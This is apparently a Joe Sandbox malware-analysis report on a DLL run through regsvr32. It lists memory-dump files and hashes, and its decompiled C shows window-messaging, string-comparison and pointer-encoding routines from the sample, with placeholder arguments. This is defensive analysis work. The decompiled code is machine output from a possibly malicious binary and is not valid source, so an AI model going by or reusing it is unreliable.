                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                              • String ID:
                                                                              • API String ID: 4186786570-0
                                                                              • Opcode ID: 11db93a9b22a2fff3dd2cc826e91f9c9359d03e9b15ac47bad877bffff7ee9a2
                                                                              • Instruction ID: 7c687740b1e0505bc30d06e98a049c53aa2c3a633786af42e2ebdaca564d420b
                                                                              • Opcode Fuzzy Hash: 11db93a9b22a2fff3dd2cc826e91f9c9359d03e9b15ac47bad877bffff7ee9a2
                                                                              • Instruction Fuzzy Hash: 285162357056C187DB60CB21E98435E6791F7C8BD8F118525EA4D8BB54EF78D8C5CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10018BFC Relevance: 15.1, APIs: 10, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Invalidate$Window$Proc
                                                                              • String ID:
                                                                              • API String ID: 570070710-0
                                                                              • Opcode ID: d6cd2c1a09269427a364e99a6bcc9430237c8422f73af390429155d771dbf08d
                                                                              • Instruction ID: e326d6aa994ad80e46bac0a10ec5768c75969b10af8e91791b753542be66806d
                                                                              • Opcode Fuzzy Hash: d6cd2c1a09269427a364e99a6bcc9430237c8422f73af390429155d771dbf08d
                                                                              • Instruction Fuzzy Hash: 00315A773256909BE751CF26F844B997B60F789B88F026101EE8A07A18DF79D685CF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001F878 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72windowthreadCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 36%
                                                                              			E1001F878(void* __ebx, signed int __edx, signed int __rax, intOrPtr* __rcx, char* __rdx, void* __r8, void* __r9, void* __r11, char _a16) {
				signed char _t24;
				long _t32;
				void* _t35;
				signed int _t37;
				signed int _t41;
				intOrPtr* _t46;
				char* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t60 = __r11;
				_t59 = __r9;
				_t58 = __r8;
				_t56 = __rdx;
				_t45 = __rax;
				_t37 = __edx;
				_t35 = __ebx;
				_t41 = __edx;
				_t46 = __rcx;
				if(__edx != 0 && ( *(__rcx + 0x78) & 0x00000004) != 0) {
					E100161B4(__rcx);
					return SetFocus(??);
				}
				GetParent();
				E10011808(_t35, _t37, _t45, _t45, _t56, _t58, _t59, _t60);
				__eflags = _t45;
				if(_t45 == 0) {
					L5:
					__eflags = _t41;
					if(_t41 != 0) {
						_t24 =  *(_t46 + 0x78);
						__eflags = _t24;
						if(_t24 < 0) {
							asm("btr eax, 0x7");
							 *(_t46 + 0x78) = _t24;
							_t45 =  *_t46;
							 *((intOrPtr*)(_t45 + 0x1f8))();
							_t57 =  *((intOrPtr*)(_t46 + 0x40));
							GetActiveWindow();
							__eflags = _t45 - _t57;
							if(_t45 == _t57) {
								r9d = 0;
								__eflags = r9d;
								_t15 = _t59 + 6; // 0x6
								_t37 = _t15;
								_t16 = _t59 + 1; // 0x1
								r8d = _t16;
								SendMessageW(??, ??, ??, ??);
							}
						}
						__eflags =  *(_t46 + 0x78) & 0x00000020;
						if(( *(_t46 + 0x78) & 0x00000020) != 0) {
							r9d = 0;
							__eflags = r9d;
							_t37 = 0x86;
							_t21 = _t59 + 1; // 0x1
							r8d = _t21;
							SendMessageW(??, ??, ??, ??);
						}
					} else {
						__eflags =  *((intOrPtr*)(_t46 + 0x140)) - _t41;
						if( *((intOrPtr*)(_t46 + 0x140)) == _t41) {
							_t45 =  *_t46;
							asm("bts dword [ebx+0x78], 0x7");
							 *((intOrPtr*)( *_t46 + 0x1f0))();
						}
					}
					asm("sbb edx, edx");
					__eflags = (_t37 & 0xfffffff0) + 0x20;
					return E1001D8E0((_t37 & 0xfffffff0) + 0x20, (_t37 & 0xfffffff0) + 0x20, _t45, _t46, _t56);
				} else {
					_t56 =  &_a16;
					_a16 = 0;
					GetWindowThreadProcessId(??, ??);
					_t32 = GetCurrentProcessId();
					__eflags = _t32 - _a16;
					if(_t32 == _a16) {
						return _t32;
					}
					goto L5;
				}
			}














                                                                              0x1001f878
                                                                              0x1001f878
                                                                              0x1001f878
                                                                              0x1001f878
                                                                              0x1001f878
                                                                              0x1001f878
                                                                              0x1001f878
                                                                              0x1001f882
                                                                              0x1001f884
                                                                              0x1001f887
                                                                              0x1001f891
                                                                              0x00000000
                                                                              0x1001f898
                                                                              0x1001f8a7
                                                                              0x1001f8b0
                                                                              0x1001f8b5
                                                                              0x1001f8b8
                                                                              0x1001f8e1
                                                                              0x1001f8e1
                                                                              0x1001f8e3
                                                                              0x1001f900
                                                                              0x1001f903
                                                                              0x1001f905
                                                                              0x1001f907
                                                                              0x1001f90e
                                                                              0x1001f911
                                                                              0x1001f914
                                                                              0x1001f91a
                                                                              0x1001f91e
                                                                              0x1001f924
                                                                              0x1001f927
                                                                              0x1001f929
                                                                              0x1001f929
                                                                              0x1001f92f
                                                                              0x1001f92f
                                                                              0x1001f933
                                                                              0x1001f933
                                                                              0x1001f937
                                                                              0x1001f937
                                                                              0x1001f927
                                                                              0x1001f93d
                                                                              0x1001f941
                                                                              0x1001f947
                                                                              0x1001f947
                                                                              0x1001f94a
                                                                              0x1001f94f
                                                                              0x1001f94f
                                                                              0x1001f953
                                                                              0x1001f953
                                                                              0x1001f8e5
                                                                              0x1001f8e5
                                                                              0x1001f8eb
                                                                              0x1001f8ed
                                                                              0x1001f8f0
                                                                              0x1001f8f8
                                                                              0x1001f8f8
                                                                              0x1001f8eb
                                                                              0x1001f95e
                                                                              0x1001f963
                                                                              0x00000000
                                                                              0x1001f8ba
                                                                              0x1001f8be
                                                                              0x1001f8c3
                                                                              0x1001f8cb
                                                                              0x1001f8d1
                                                                              0x1001f8d7
                                                                              0x1001f8db
                                                                              0x1001f972
                                                                              0x1001f972
                                                                              0x00000000
                                                                              0x1001f8db

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                                                              • String ID:
                                                                              • API String ID: 2169720751-3916222277
                                                                              • Opcode ID: bff41b14e89815757efc0c1e3cc72b9cb72d7112d4dbfbd3aaa155cf264fbe01
                                                                              • Instruction ID: 408b155a065c601858c6a7788403544c231ac27d76090d609d846d0a01344dfb
                                                                              • Opcode Fuzzy Hash: bff41b14e89815757efc0c1e3cc72b9cb72d7112d4dbfbd3aaa155cf264fbe01
                                                                              • Instruction Fuzzy Hash: 0221913270094182EB16DF76D8507A837A1FBC9F8DF1A802ACE4A4B664DF79C8C5C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003736C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Stock$CapsDeviceRelease
                                                                              • String ID: System
                                                                              • API String ID: 46613423-3470857405
                                                                              • Opcode ID: d1bf7cba0672017227d63bc3e7a042100e309fcf245a24bd182551fd9fab9ad5
                                                                              • Instruction ID: 955db5f0085e197a63ea50968b5ee3543521ce75fee8c552bb4f2e422539c78b
                                                                              • Opcode Fuzzy Hash: d1bf7cba0672017227d63bc3e7a042100e309fcf245a24bd182551fd9fab9ad5
                                                                              • Instruction Fuzzy Hash: ED119D317057444AEB269B21FC247EA2391FB8CB86F8544399E8E47784DF7CD489CB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003CEB0 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CED0
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CEFD
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CF14
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: C$C$DecodePointer$EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 667068680-2823894051
                                                                              • Opcode ID: 101ffbb1886b3cb138e85cd79be2068f5202f9efb3c35ee722ddfea817b174d3
                                                                              • Instruction ID: 8d3743b9983ab12ceedc7e2a3a32ca1b320974c6fd6290382b0499826b7f078f
                                                                              • Opcode Fuzzy Hash: 101ffbb1886b3cb138e85cd79be2068f5202f9efb3c35ee722ddfea817b174d3
                                                                              • Instruction Fuzzy Hash: 30214435206B8086E742DF21E8447D933B5F749B88F98023ADE8D0B728CFB9C599CB11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100519C0 Relevance: 13.8, APIs: 9, Instructions: 336COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 34%
                                                                              			E100519C0(signed int __edx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, signed long long __rdi, long long __rsi, signed long long __r9, void* __r10, void* __r11, long long __r12, long long __r13, long long __r14, long long __r15) {
				signed int _t93;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t109;
				signed int _t110;
				int _t112;
				signed int _t120;
				long _t124;
				signed int _t127;
				signed int _t129;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t148;
				signed long long _t166;
				signed long long _t167;
				signed long long _t169;
				signed long long _t170;
				intOrPtr* _t171;
				intOrPtr* _t172;
				long long _t173;
				signed long long _t175;
				signed int _t177;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				signed char* _t189;
				signed long long _t192;
				signed int _t196;
				signed long long _t197;
				void* _t198;
				void* _t199;
				void* _t213;
				void* _t214;
				intOrPtr* _t216;
				signed long long _t218;
				signed long long _t220;
				signed char* _t226;
				signed long long _t228;

				_t223 = __r14;
				_t214 = __r11;
				_t213 = __r10;
				_t210 = __r9;
				_t194 = __rsi;
				_t192 = __rdi;
				_t173 = __rbx;
				_t199 = _t198 - 0xa0;
				_t197 = _t199 + 0x30;
				 *((long long*)(_t197 + 0x68)) = __rbx;
				 *((long long*)(_t197 + 0x60)) = __rsi;
				 *((long long*)(_t197 + 0x58)) = __rdi;
				 *((long long*)(_t197 + 0x50)) = __r12;
				 *((long long*)(_t197 + 0x48)) = __r13;
				 *((long long*)(_t197 + 0x40)) = __r14;
				 *((long long*)(_t197 + 0x38)) = __r15;
				_t166 =  *0x1006f4c8; // 0x6f13091946cb
				_t167 = _t166 ^ _t197;
				 *(_t197 + 0x28) = _t167;
				_t226 =  *((intOrPtr*)(_t197 + 0xa8));
				 *_t197 = r8d;
				r8d =  *0x10075c04; // 0x0
				_t220 = __r9;
				r14d = __edx;
				 *(_t197 + 4) = __edx;
				_t216 = __rcx;
				 *(_t197 + 8) = _t226;
				if(r8d == 0) {
					_t13 = _t173 - 1; // 0x1
					r9d = _t13;
					_t126 = 0;
					 *(_t199 + 0x28) = 1;
					 *(_t199 + 0x20) = 0x1005ea8c;
					if(CompareStringW(??, ??, ??, ??, ??, ??) == 0) {
						_t124 = GetLastError();
						r8d =  *0x10075c04; // 0x0
						__eflags = _t124 - 0x78;
						r8d =  ==  ? 2 : r8d;
					} else {
						_t16 = _t173 - 1; // 0x1
						r8d = _t16;
					}
					 *0x10075c04 = r8d;
				}
				r9d =  *(_t197 + 0xa0);
				r10d = 0xffffffff;
				if(r9d <= 0) {
					__eflags = r9d - r10d;
					if(r9d < r10d) {
						L89:
						L94:
						return E10038D20(_t126,  *(_t197 + 0x28) ^ _t197);
					}
					L12:
					_t129 =  *(_t197 + 0xb0);
					if(_t129 <= 0) {
						__eflags = _t129 - r10d;
						if(_t129 < r10d) {
							goto L89;
						}
						L19:
						if(r8d == 2 || r8d == 0) {
							__eflags = r14d;
							_t175 = _t192;
							if(r14d == 0) {
								_t167 =  *_t216;
								r14d =  *(_t167 + 0x14);
							}
							_t148 =  *(_t197 + 0xb8);
							__eflags = _t148;
							if(_t148 == 0) {
								_t167 =  *_t216;
								_t148 =  *(_t167 + 4);
							}
							_t126 = r14d;
							_t93 = E100506C0(_t210);
							__eflags = _t93 - 0xffffffff;
							r12d = _t93;
							if(_t93 != 0xffffffff) {
								__eflags = _t93 - _t148;
								if(_t93 == _t148) {
									L91:
									r9d =  *(_t197 + 0xa0);
									 *(_t199 + 0x28) =  *(_t197 + 0xb0);
									_t126 = r14d;
									 *(_t199 + 0x20) = _t226;
									CompareStringA(??, ??, ??, ??, ??, ??);
									__eflags = _t175;
									if(_t175 != 0) {
										E10039620(_t167, _t175);
										E10039620(_t167, _t192);
									}
									goto L94;
								}
								_t126 = _t148;
								 *(_t199 + 0x28) = 0;
								 *(_t199 + 0x20) = _t192;
								E10050730(_t148, _t93, _t148, _t175, _t192, _t194, _t220, _t197 + 0xa0, _t213, _t214, _t216, _t220, _t223, _t226);
								__eflags = _t167;
								_t175 = _t167;
								if(_t167 == 0) {
									goto L89;
								}
								_t126 = _t148;
								 *(_t199 + 0x28) = 0;
								 *(_t199 + 0x20) = _t192;
								E10050730(_t148, r12d, _t148, _t175, _t192, _t194, _t226, _t197 + 0xb0, _t213, _t214, _t216, _t220, _t223, _t226);
								__eflags = _t167;
								_t192 = _t167;
								if(_t167 != 0) {
									_t220 = _t175;
									_t226 = _t167;
									goto L91;
								}
								E10039620(_t167, _t175);
							}
							goto L89;
						} else {
							if(r8d != 1) {
								goto L89;
							}
							r14d =  *(_t197 + 0xb8);
							_t146 = 0;
							if(r14d == 0) {
								r14d =  *( *_t216 + 4);
							}
							if(r9d == 0 || _t129 == 0) {
								if(r9d != _t129) {
									__eflags = _t129 - 1;
									if(_t129 <= 1) {
										__eflags = r9d - 1;
										if(r9d <= 1) {
											_t126 = r14d;
											_t102 = GetCPInfo(??, ??);
											__eflags = _t102;
											if(_t102 == 0) {
												goto L89;
											}
											r9d =  *(_t197 + 0xa0);
											__eflags = r9d;
											if(r9d <= 0) {
												__eflags =  *(_t197 + 0xb0) - _t146;
												if( *(_t197 + 0xb0) <= _t146) {
													goto L49;
												}
												__eflags =  *((intOrPtr*)(_t197 + 0x10)) - 2;
												if( *((intOrPtr*)(_t197 + 0x10)) < 2) {
													goto L29;
												}
												__eflags =  *((intOrPtr*)(_t197 + 0x16)) - dil;
												_t171 = _t197 + 0x16;
												while(__eflags != 0) {
													_t126 =  *(_t171 + 1) & 0x000000ff;
													__eflags = _t126;
													if(_t126 == 0) {
														goto L29;
													}
													_t142 =  *_t226 & 0x000000ff;
													__eflags = _t142 -  *_t171;
													if(_t142 <  *_t171) {
														L48:
														_t171 = _t171 + _t173;
														__eflags =  *_t171 - dil;
														continue;
													}
													__eflags = _t142 - _t126;
													if(_t142 <= _t126) {
														goto L27;
													}
													goto L48;
												}
												goto L29;
											}
											__eflags =  *((intOrPtr*)(_t197 + 0x10)) - 2;
											if( *((intOrPtr*)(_t197 + 0x10)) < 2) {
												goto L31;
											}
											__eflags =  *((intOrPtr*)(_t197 + 0x16)) - dil;
											_t172 = _t197 + 0x16;
											while(__eflags != 0) {
												_t126 =  *(_t172 + 1) & 0x000000ff;
												__eflags = _t126;
												if(_t126 == 0) {
													goto L31;
												}
												_t143 =  *_t220 & 0x000000ff;
												__eflags = _t143 -  *_t172;
												if(_t143 <  *_t172) {
													L40:
													_t172 = _t172 + _t173;
													__eflags =  *_t172 - dil;
													continue;
												}
												__eflags = _t143 - _t126;
												if(_t143 <= _t126) {
													goto L27;
												}
												goto L40;
											}
										}
										L31:
										goto L94;
									}
									L29:
									goto L94;
								}
								L27:
								goto L94;
							} else {
								L49:
								_t126 = r14d;
								 *(_t199 + 0x28) = _t146;
								 *(_t199 + 0x20) = _t192;
								_t103 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
								__eflags = _t103;
								_t228 = _t103;
								if(__eflags == 0 || __eflags <= 0) {
									goto L89;
								} else {
									_t168 = 0xffffffe0;
									_t104 = _t103 / _t228;
									__eflags = 0xffffffe0 - _t173;
									if(0xffffffe0 < _t173) {
										goto L89;
									}
									_t184 = _t228 + _t228 + 0x10;
									__eflags = _t184 - 0x400;
									if(_t184 > 0x400) {
										E10039550(0xffffffe0, 0xfffffff0, _t184, _t192, _t194);
										__eflags = 0xffffffe0;
										_t196 = 0xffffffe0;
										if(0xffffffe0 == 0) {
											L60:
											__eflags = _t196;
											if(_t196 == 0) {
												goto L89;
											}
											r9d =  *(_t197 + 0xa0);
											_t126 = r14d;
											 *(_t199 + 0x28) = r15d;
											 *(_t199 + 0x20) = _t196;
											_t106 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
											__eflags = _t106;
											if(_t106 == 0) {
												L77:
												__eflags =  *((intOrPtr*)(_t196 - 0x10)) - 0xdddd;
												_t68 = _t196 - 0x10; // -16
												_t185 = _t68;
												if( *((intOrPtr*)(_t196 - 0x10)) == 0xdddd) {
													E10039620(_t168, _t185);
												}
												goto L94;
											}
											r9d =  *(_t197 + 0xb0);
											_t126 = r14d;
											 *(_t199 + 0x28) = _t146;
											 *(_t199 + 0x20) = _t192;
											_t109 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
											__eflags = _t109;
											_t218 = _t109;
											if(_t109 <= 0) {
												goto L77;
											}
											_t168 = 0xffffffe0;
											_t110 = _t109 / _t218;
											__eflags = 0xffffffe0 - 2;
											if(0xffffffe0 < 2) {
												goto L77;
											}
											_t186 = _t218 + _t218 + 0x10;
											__eflags = _t186 - 0x400;
											if(_t186 > 0x400) {
												E10039550(0xffffffe0, 0xfffffff0, _t186, _t192, _t196);
												__eflags = 0xffffffe0;
												_t177 = 0xffffffe0;
												if(0xffffffe0 == 0) {
													L72:
													__eflags = _t177;
													if(_t177 != 0) {
														r9d =  *(_t197 + 0xb0);
														_t126 = r14d;
														 *(_t199 + 0x28) = r12d;
														 *(_t199 + 0x20) = _t177;
														_t112 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
														__eflags = _t112;
														if(_t112 != 0) {
															_t126 =  *(_t197 + 4);
															r9d = r15d;
															 *(_t199 + 0x28) = r12d;
															 *(_t199 + 0x20) = _t177;
															_t146 = CompareStringW(??, ??, ??, ??, ??, ??);
														}
														__eflags =  *((intOrPtr*)(_t177 - 0x10)) - 0xdddd;
														_t66 = _t177 - 0x10; // -16
														_t187 = _t66;
														if( *((intOrPtr*)(_t177 - 0x10)) == 0xdddd) {
															E10039620(_t168, _t187);
														}
													}
													goto L77;
												}
												 *0xffffffe0 = 0xdddd;
												L71:
												_t177 = _t177 + 0x10;
												__eflags = _t177;
												goto L72;
											}
											_t169 = _t186 + 0xf;
											__eflags = _t169 - _t186;
											if(_t169 <= _t186) {
												_t169 = 0xfffffff0;
											}
											_t168 = _t169 & 0xfffffff0;
											E100534D0(_t110, _t168, _t213, _t214);
											_t199 = _t199 - _t168;
											_t177 = _t199 + 0x30;
											__eflags = _t177;
											if(_t177 == 0) {
												goto L77;
											} else {
												 *_t177 = 0xcccc;
												goto L71;
											}
										}
										 *0xffffffe0 = 0xdddd;
										L59:
										_t196 = _t196 + 0x10;
										__eflags = _t196;
										goto L60;
									}
									_t42 = _t184 + 0xf; // 0xf
									_t170 = _t42;
									__eflags = _t170 - _t184;
									if(_t170 <= _t184) {
										_t170 = 0xfffffff0;
									}
									_t168 = _t170 & 0xfffffff0;
									E100534D0(_t104, _t168, _t213, _t214);
									_t199 = _t199 - _t168;
									_t196 = _t199 + 0x30;
									__eflags = _t196;
									if(_t196 == 0) {
										goto L89;
									} else {
										 *_t196 = 0xcccc;
										goto L59;
									}
								}
							}
						}
					}
					_t120 = _t129;
					_t189 = _t226;
					while(1) {
						_t120 = _t120 - 1;
						if( *_t189 == 0) {
							break;
						}
						_t189 =  &(_t189[1]);
						if(_t120 != 0) {
							continue;
						}
						_t120 = r10d;
						break;
					}
					r10d = r10d - _t120;
					_t129 = _t129 + r10d;
					 *(_t197 + 0xb0) = _t129;
					goto L19;
				}
				_t127 = r9d;
				_t167 = _t220;
				while(1) {
					_t126 = _t127 - 1;
					if( *_t167 == 0) {
						break;
					}
					_t167 = _t167 + 1;
					if(_t126 != 0) {
						continue;
					}
					_t126 = r10d;
					break;
				}
				r9d = r9d + r10d - _t126;
				 *(_t197 + 0xa0) = r9d;
				goto L12;
			}













































                                                                              0x100519c0
                                                                              0x100519c0
                                                                              0x100519c0
                                                                              0x100519c0
                                                                              0x100519c0
                                                                              0x100519c0
                                                                              0x100519c0
                                                                              0x100519c2
                                                                              0x100519c9
                                                                              0x100519ce
                                                                              0x100519d2
                                                                              0x100519d6
                                                                              0x100519da
                                                                              0x100519de
                                                                              0x100519e2
                                                                              0x100519e6
                                                                              0x100519ea
                                                                              0x100519f1
                                                                              0x100519f4
                                                                              0x100519f8
                                                                              0x100519ff
                                                                              0x10051a03
                                                                              0x10051a0d
                                                                              0x10051a10
                                                                              0x10051a13
                                                                              0x10051a16
                                                                              0x10051a19
                                                                              0x10051a22
                                                                              0x10051a2b
                                                                              0x10051a2b
                                                                              0x10051a31
                                                                              0x10051a33
                                                                              0x10051a3b
                                                                              0x10051a48
                                                                              0x10051a50
                                                                              0x10051a56
                                                                              0x10051a5d
                                                                              0x10051a60
                                                                              0x10051a4a
                                                                              0x10051a4a
                                                                              0x10051a4a
                                                                              0x10051a4a
                                                                              0x10051a64
                                                                              0x10051a64
                                                                              0x10051a6b
                                                                              0x10051a72
                                                                              0x10051a7b
                                                                              0x10051aa7
                                                                              0x10051aaa
                                                                              0x10051e3d
                                                                              0x10051e85
                                                                              0x10051eb2
                                                                              0x10051eb2
                                                                              0x10051ab0
                                                                              0x10051ab0
                                                                              0x10051ab8
                                                                              0x10051ae1
                                                                              0x10051ae4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051aea
                                                                              0x10051aed
                                                                              0x10051db7
                                                                              0x10051dba
                                                                              0x10051dbd
                                                                              0x10051dbf
                                                                              0x10051dc3
                                                                              0x10051dc3
                                                                              0x10051dc7
                                                                              0x10051dcd
                                                                              0x10051dcf
                                                                              0x10051dd1
                                                                              0x10051dd5
                                                                              0x10051dd5
                                                                              0x10051dd8
                                                                              0x10051ddb
                                                                              0x10051de0
                                                                              0x10051de3
                                                                              0x10051de6
                                                                              0x10051de8
                                                                              0x10051dea
                                                                              0x10051e47
                                                                              0x10051e4d
                                                                              0x10051e57
                                                                              0x10051e5e
                                                                              0x10051e61
                                                                              0x10051e66
                                                                              0x10051e6c
                                                                              0x10051e71
                                                                              0x10051e76
                                                                              0x10051e7e
                                                                              0x10051e7e
                                                                              0x00000000
                                                                              0x10051e83
                                                                              0x10051df8
                                                                              0x10051dfa
                                                                              0x10051dfe
                                                                              0x10051e03
                                                                              0x10051e08
                                                                              0x10051e0b
                                                                              0x10051e0e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051e1d
                                                                              0x10051e1f
                                                                              0x10051e23
                                                                              0x10051e28
                                                                              0x10051e2d
                                                                              0x10051e30
                                                                              0x10051e33
                                                                              0x10051e41
                                                                              0x10051e44
                                                                              0x00000000
                                                                              0x10051e44
                                                                              0x10051e38
                                                                              0x10051e38
                                                                              0x00000000
                                                                              0x10051afc
                                                                              0x10051b00
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051b06
                                                                              0x10051b0d
                                                                              0x10051b12
                                                                              0x10051b18
                                                                              0x10051b18
                                                                              0x10051b1f
                                                                              0x10051b2c
                                                                              0x10051b35
                                                                              0x10051b38
                                                                              0x10051b44
                                                                              0x10051b48
                                                                              0x10051b58
                                                                              0x10051b5b
                                                                              0x10051b61
                                                                              0x10051b63
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051b69
                                                                              0x10051b70
                                                                              0x10051b73
                                                                              0x10051ba1
                                                                              0x10051ba7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051ba9
                                                                              0x10051bac
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051bae
                                                                              0x10051bb2
                                                                              0x10051bb6
                                                                              0x10051bb8
                                                                              0x10051bbc
                                                                              0x10051bbe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051bc4
                                                                              0x10051bc8
                                                                              0x10051bca
                                                                              0x10051bd4
                                                                              0x10051bd4
                                                                              0x10051bd7
                                                                              0x00000000
                                                                              0x10051bd7
                                                                              0x10051bcc
                                                                              0x10051bce
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051bce
                                                                              0x00000000
                                                                              0x10051bb6
                                                                              0x10051b75
                                                                              0x10051b78
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051b7a
                                                                              0x10051b7e
                                                                              0x10051b82
                                                                              0x10051b84
                                                                              0x10051b88
                                                                              0x10051b8a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051b8c
                                                                              0x10051b91
                                                                              0x10051b93
                                                                              0x10051b99
                                                                              0x10051b99
                                                                              0x10051b9c
